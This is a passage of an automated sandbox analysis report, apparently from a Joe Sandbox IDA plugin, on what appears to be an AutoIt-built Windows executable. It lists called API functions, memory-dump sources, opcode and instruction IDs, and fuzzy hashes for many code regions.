                                                                    • Opcode Fuzzy Hash: 0435a3707f0ab58d2f0c1f53ab119aba0806b11d1c7bc3fb265731d548715422
                                                                    • Instruction Fuzzy Hash: 66019270244708BEF3211E68CC8AF763BDDAB01B68F14831ABBE59A2D0C6B91C459B54
                                                                    APIs
                                                                      • Part of subcall function 00FF571C: __FF_MSGBANNER.LIBCMT ref: 00FF5733
                                                                      • Part of subcall function 00FF571C: __NMSG_WRITE.LIBCMT ref: 00FF573A
                                                                      • Part of subcall function 00FF571C: RtlAllocateHeap.NTDLL(01500000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F
                                                                    • std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                    • __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                      • Part of subcall function 00FF859B: RaiseException.KERNEL32(?,?,?,01089E78,00000000,?,?,?,?,00FF0E06,?,01089E78,?,00000001), ref: 00FF85F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: 5929a76e6a1cfad0cbd3514793be3f0ae7c3b37f541b8c8d50e123126ee7009d
                                                                    • Instruction ID: 3e3302a01b659197d341cbd86be375ff473766beb5c163f85c5515de5d8623e6
                                                                    • Opcode Fuzzy Hash: 5929a76e6a1cfad0cbd3514793be3f0ae7c3b37f541b8c8d50e123126ee7009d
                                                                    • Instruction Fuzzy Hash: F1F0A432D0021E66CB14FA94EC019FE7BAC9F113A1F104469FB44961A2EF749A81A6D1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file_memset
                                                                    • String ID:
                                                                    • API String ID: 26237723-0
                                                                    • Opcode ID: 9777a9315467a5a40f9bc223e5e8bf983b13479f3f8c6114b58c50178a7926c4
                                                                    • Instruction ID: e49c649dd819bcd0cb70894708a149bcdef2c7acd26b2c4e1a4587dda05b5e8e
                                                                    • Opcode Fuzzy Hash: 9777a9315467a5a40f9bc223e5e8bf983b13479f3f8c6114b58c50178a7926c4
                                                                    • Instruction Fuzzy Hash: AA01F771C00A0CEBCF22AF648C024BE7B61AF90B61F404115FB249B271DB798A12FF91
                                                                    APIs
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    • __lock_file.LIBCMT ref: 00FF53EB
                                                                      • Part of subcall function 00FF6C11: __lock.LIBCMT ref: 00FF6C34
                                                                    • __fclose_nolock.LIBCMT ref: 00FF53F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: 285f36b519f068d5aef62047a84ea3311c76d511bf86f8c0bedbce0206f91b90
                                                                    • Instruction ID: 57c093b3f3e0d56ae4c1a1f5cb200a4ddafe3146c0ce4cb0a750fd3cc957dba0
                                                                    • Opcode Fuzzy Hash: 285f36b519f068d5aef62047a84ea3311c76d511bf86f8c0bedbce0206f91b90
                                                                    • Instruction Fuzzy Hash: 54F09631D00A1C9ADB21AB799C017BD76A16F41BB5F208109A764AB1F1DFFC8942BB51
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00FD542F,?,?,?,?,?), ref: 00FD807A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00FD542F,?,?,?,?,?), ref: 00FD80AD
                                                                      • Part of subcall function 00FD774D: _memmove.LIBCMT ref: 00FD7789
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$_memmove
                                                                    • String ID:
                                                                    • API String ID: 3033907384-0
                                                                    • Opcode ID: 576c609856b98e6a0d4b7e8bfdf55a41e4401658d302d47bada62400bd185a59
                                                                    • Instruction ID: 019f41ba89a00867281349cb375b69b1bb8c219ce175ca50407c4f6f684ef2b9
                                                                    • Opcode Fuzzy Hash: 576c609856b98e6a0d4b7e8bfdf55a41e4401658d302d47bada62400bd185a59
                                                                    • Instruction Fuzzy Hash: 5A01A2712012047FEB246A21DC4AF7B3B6EEF85360F14802AFA05CE291DE659800D661
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: de56835962733d50a9d3357f821c916755190b2de2af136395288b47b82b31f0
                                                                    • Instruction ID: fde6006b532c958d731ca4b525312ae307c8ca834ebd2624b1e97cc36a289393
                                                                    • Opcode Fuzzy Hash: de56835962733d50a9d3357f821c916755190b2de2af136395288b47b82b31f0
                                                                    • Instruction Fuzzy Hash: C961AA71A0020A9FCB10DF64C880EAAB7F6EF05314F18846AE947DB391DBB5ED44EB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c162654697b563cf2ec5cbaedb64337663e0404866b537e2e453a1b691ea56ca
                                                                    • Instruction ID: 06357f4792604f713953c7b1486672bd042bfc7fd027261476e4a1c47b16e6da
                                                                    • Opcode Fuzzy Hash: c162654697b563cf2ec5cbaedb64337663e0404866b537e2e453a1b691ea56ca
                                                                    • Instruction Fuzzy Hash: 7C51D4316002049FCF14EF68CC91FAE77AAAF85310F1840A9F9469B396DB39ED00EB41
                                                                    APIs
                                                                      • Part of subcall function 01581A58: GetFileAttributesW.KERNELBASE(?), ref: 01581A63
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01582356
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesCreateDirectoryFile
                                                                    • String ID:
                                                                    • API String ID: 3401506121-0
                                                                    • Opcode ID: 2442e14db4b5a420852ff2db498ef20bbbdaf058de6095188d7e886d72e35fc1
                                                                    • Instruction ID: a22a98c3251e8a7e1fb3c6688384936dc040f737e661dfa2ea9d8c97f753cdc9
                                                                    • Opcode Fuzzy Hash: 2442e14db4b5a420852ff2db498ef20bbbdaf058de6095188d7e886d72e35fc1
                                                                    • Instruction Fuzzy Hash: 7261B331A1020997EF14EFA4D844BEF773AFF58700F004569A60DFB290EB759A49CBA5
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00FD5B96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 3bbf443a0b19fb986ae053f3011e8e49bddf33175ddbf7b83ac5ee4d3b766583
                                                                    • Instruction ID: c2df4045de8bdf887ea7b7d533067092bcc3968238c200272562988af68570a6
                                                                    • Opcode Fuzzy Hash: 3bbf443a0b19fb986ae053f3011e8e49bddf33175ddbf7b83ac5ee4d3b766583
                                                                    • Instruction Fuzzy Hash: AB313C31A00A05AFCB18DF6CC880A6DB7B6FF84720F18865BD81597750D770B990DB91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: 696c99a35b8e1faff84c9fbe07ca3b2ffb85f2f94844093b2d181b0ff60047b5
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: FE31D2B5A001099BC718DF58C484A79F7A6FF59310B6487A5E90ACB366DB31EDC1EBC0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: e6cbeb112e0b33e012e8b974909d9db6c58ece2e444f2ea47ed5208e56dc9f28
                                                                    • Instruction ID: 4c928acc6c3ebef1ff82b9fdef933cb40537aff8a683cae79995b68cfcc7d347
                                                                    • Opcode Fuzzy Hash: e6cbeb112e0b33e012e8b974909d9db6c58ece2e444f2ea47ed5208e56dc9f28
                                                                    • Instruction Fuzzy Hash: 4A413774A08341CFDB25DF28C444B1ABBE2BF45318F09889DE9998B362C776E845DF52
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: ece36c908f46e16dd85c0c15dec50539bd9b4eb722b231aec53632be1144cf67
                                                                    • Instruction ID: 47d71b064c350efe120bdb9f702834adf380a09847fb0609b86e87303497e59a
                                                                    • Opcode Fuzzy Hash: ece36c908f46e16dd85c0c15dec50539bd9b4eb722b231aec53632be1144cf67
                                                                    • Instruction Fuzzy Hash: 2A213571904A0DEBEB125FD1E880AAE7FB9FF00310F24846AE4C5C2181EBB58090E756
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp
                                                                    • String ID:
                                                                    • API String ID: 856254489-0
                                                                    • Opcode ID: de86fc9090997e7e6f043cd0befc11388eeb08686bad0e5ad86c429ada505a1f
                                                                    • Instruction ID: 8014173f750ce9ffba66d4de80cb668c3e8b88b5bb0e4ac2c1356e050ccb4a10
                                                                    • Opcode Fuzzy Hash: de86fc9090997e7e6f043cd0befc11388eeb08686bad0e5ad86c429ada505a1f
                                                                    • Instruction Fuzzy Hash: 7211D532904119DBCF14FBA9DC419EEB77AEF44760F084117F951AB290DA359D05EB90
                                                                    APIs
                                                                      • Part of subcall function 00FD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FD4BEF
                                                                      • Part of subcall function 00FF525B: __wfsopen.LIBCMT ref: 00FF5266
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E0F
                                                                      • Part of subcall function 00FD4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FD4BA4
                                                                      • Part of subcall function 00FD4C70: _memmove.LIBCMT ref: 00FD4CBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                    • String ID:
                                                                    • API String ID: 1396898556-0
                                                                    • Opcode ID: 57ed0563b569a1027702821b7ab0f802737e55c790c0352bc1c9d4daa9b38cf6
                                                                    • Instruction ID: 66e7375f1b52e2f0ec7a658ec431521d505c1a314bbbc2160062d3eec918a423
                                                                    • Opcode Fuzzy Hash: 57ed0563b569a1027702821b7ab0f802737e55c790c0352bc1c9d4daa9b38cf6
                                                                    • Instruction Fuzzy Hash: 7111EB31600206B7DF11FFB4CC12F6D77A6AF84710F14842FF545A7281DA79AA00B751
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 09af346a3ce6d91ab74dbcf71c0d1ba994fab7f02ca1887f7356201c6c0f38dc
                                                                    • Instruction ID: 34987fb3b5dfcd1aa57fde54e2c0fa0b218fe9f5406dbda92cb105ba300f7c64
                                                                    • Opcode Fuzzy Hash: 09af346a3ce6d91ab74dbcf71c0d1ba994fab7f02ca1887f7356201c6c0f38dc
                                                                    • Instruction Fuzzy Hash: 8B212674908341DFDB14DF64C844B1ABBE2BF88314F09895DF98957722D735E805DB92
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00FD56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FD5C16
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: eb314c384e7f2afe4dbccd3f95a100ad45ca7fcd44ba14f26b975a3375001474
                                                                    • Instruction ID: deb689f413301a1485f434bd456a236a768bad178a94b1f3785d7abfad7824e6
                                                                    • Opcode Fuzzy Hash: eb314c384e7f2afe4dbccd3f95a100ad45ca7fcd44ba14f26b975a3375001474
                                                                    • Instruction Fuzzy Hash: 23116A31600B009FD3308F19C880B62B7EAEF84B60F18C91FE9AA87A40D771F844DB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
                                                                    • Instruction ID: baa8a8cf1d70043ad8b440e409797107afdfb2f507472a5d7c42679c8d167081
                                                                    • Opcode Fuzzy Hash: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
                                                                    • Instruction Fuzzy Hash: C701A7B9200506AFC305DB68C851D2AF7AAFF95310714455AF559C7712DB35FC21DBE0
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath
                                                                    • String ID:
                                                                    • API String ID: 82841172-0
                                                                    • Opcode ID: 75527f81eef7fd904e20a4994de80c1dbf6295db52c90ce1c282923914999723
                                                                    • Instruction ID: 50c3c6415f5cf0ecc5c8fa82901ff0e28e0a8bff4a1a30cfb863484361b69722
                                                                    • Opcode Fuzzy Hash: 75527f81eef7fd904e20a4994de80c1dbf6295db52c90ce1c282923914999723
                                                                    • Instruction Fuzzy Hash: 48F0C8725441946FC3215B749C899F6BFB8EFC7264B1841FBECC88E926E9254847C7C1
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00FF48A6
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 2ea42835b527c2f18086d3c3d46cf9969564db06d80a2a4bcb500f3049688cf0
                                                                    • Instruction ID: 5fc1944fb7f8a07fe26dd0c4beb06958f56d075cbae64c70ff8181e4fb76bebe
                                                                    • Opcode Fuzzy Hash: 2ea42835b527c2f18086d3c3d46cf9969564db06d80a2a4bcb500f3049688cf0
                                                                    • Instruction Fuzzy Hash: 68F0FF3290020CABDF21AFB48C063BF36A0AF007A6F008404B6209A1B1DBBC8952FB51
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
